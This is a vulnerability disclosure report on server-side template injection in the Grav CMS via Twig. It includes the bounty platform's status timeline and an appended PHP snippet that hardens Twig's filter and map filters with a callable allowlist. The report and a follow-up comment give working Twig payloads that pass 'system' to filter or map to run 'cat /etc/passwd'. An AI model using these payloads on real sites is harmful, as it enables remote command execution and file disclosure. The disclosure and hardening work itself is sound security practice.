Server Side Template Injection in getgrav/grav
Valid
Reported on Apr 7th 2022
Description
Grav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.
Proof of Concept
Payload:
{{['cat\x20/etc/passwd']|filter('system')}}
- With an authenticated user, access the admin panel.
- Edit a page, enabling Twig in the Advanced tab.
- Put the payload in the content.
- Save and check out the post.
Impact
Remote command execution
- We are processing your report and will contact the getgrav/grav team within 24 hours.
- Renan Rocha modified the report.
- We have contacted a member of the getgrav/grav team and are waiting to hear back.
- We have sent a follow up to the getgrav/grav team. We will try again in 7 days.
- We have sent a second follow up to the getgrav/grav team. We will try again in 10 days.
- We have sent a third and final follow up to the getgrav/grav team. This report is now considered stale.
- This issue has been fixed, but we're waiting for a release before going public.
- The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
- The researcher's credibility has increased: +7
- We have sent a fix follow up to the getgrav/grav team. We will try again in 7 days.
- We have sent a second fix follow up to the getgrav/grav team. We will try again in 10 days.
- Twig.php#L164-L210 has been validated.
ng`bthg commented 10 months ago:
It is still vulnerable with the payload:
{{['cat$IFS/etc/passwd']|map('system')|join}}
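As an added hardening example (not Grav's or Twig's own code), the following re-registers Twig's filter and map filters so that a string callable naming a PHP function such as system, the vector behind both the report's filter('system') payload and the map('system') payload in the comment above, is refused before it is ever invoked; the SAFE_CALLABLES allowlist and the checkCallable helper are hypothetical names, and the snippet assumes Twig 3 installed via Composer.

```php
<?php
// Added hardening example, not Grav's or Twig's own code. Assumes Twig 3 via Composer;
// SAFE_CALLABLES and checkCallable are hypothetical names chosen for this example.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\RuntimeError;
use Twig\Loader\ArrayLoader;
use Twig\TwigFilter;

// PHP function names a template may pass as a string callable; everything else is refused.
const SAFE_CALLABLES = ['strtoupper', 'strtolower', 'trim', 'ucfirst', 'abs', 'intval'];

// Closures (arrow functions written in the template) pass; a string such as 'system',
// 'exec' or 'passthru' is rejected here, before the filter ever invokes it.
function checkCallable($callable, string $filterName): void
{
    if ($callable instanceof \Closure) {
        return;
    }
    if (is_string($callable) && in_array(strtolower($callable), SAFE_CALLABLES, true)) {
        return;
    }
    $shown = is_string($callable) ? $callable : gettype($callable);
    throw new RuntimeError(sprintf('Filter "%s" does not accept callable "%s".', $filterName, $shown));
}

$twig = new Environment(new ArrayLoader([
    'benign'  => '{{ [1, 2, 3]|map(v => v * 2)|join(",") }}',
    'blocked' => "{{ ['x']|map('system')|join }}", // same shape as the reported payloads
]));

// Re-register filter and map under the core names (reduce and sort's comparator deserve the
// same treatment). Filters added to the Environment live in Twig's staging extension, which
// is initialised after the core extension, so these definitions take over.
$twig->addFilter(new TwigFilter('filter', function (array $array, $arrow): array {
    checkCallable($arrow, 'filter');
    return array_filter($array, $arrow, ARRAY_FILTER_USE_BOTH);
}));
$twig->addFilter(new TwigFilter('map', function (iterable $array, $arrow): array {
    checkCallable($arrow, 'map');
    $out = [];
    foreach ($array as $k => $v) { $out[$k] = $arrow($v, $k); }
    return $out;
}));

echo $twig->render('benign'), PHP_EOL;          // prints 2,4,6
try {
    $twig->render('blocked');
} catch (RuntimeError $e) {
    echo 'Blocked: ', $e->getMessage(), PHP_EOL; // the string callable was never executed
}
```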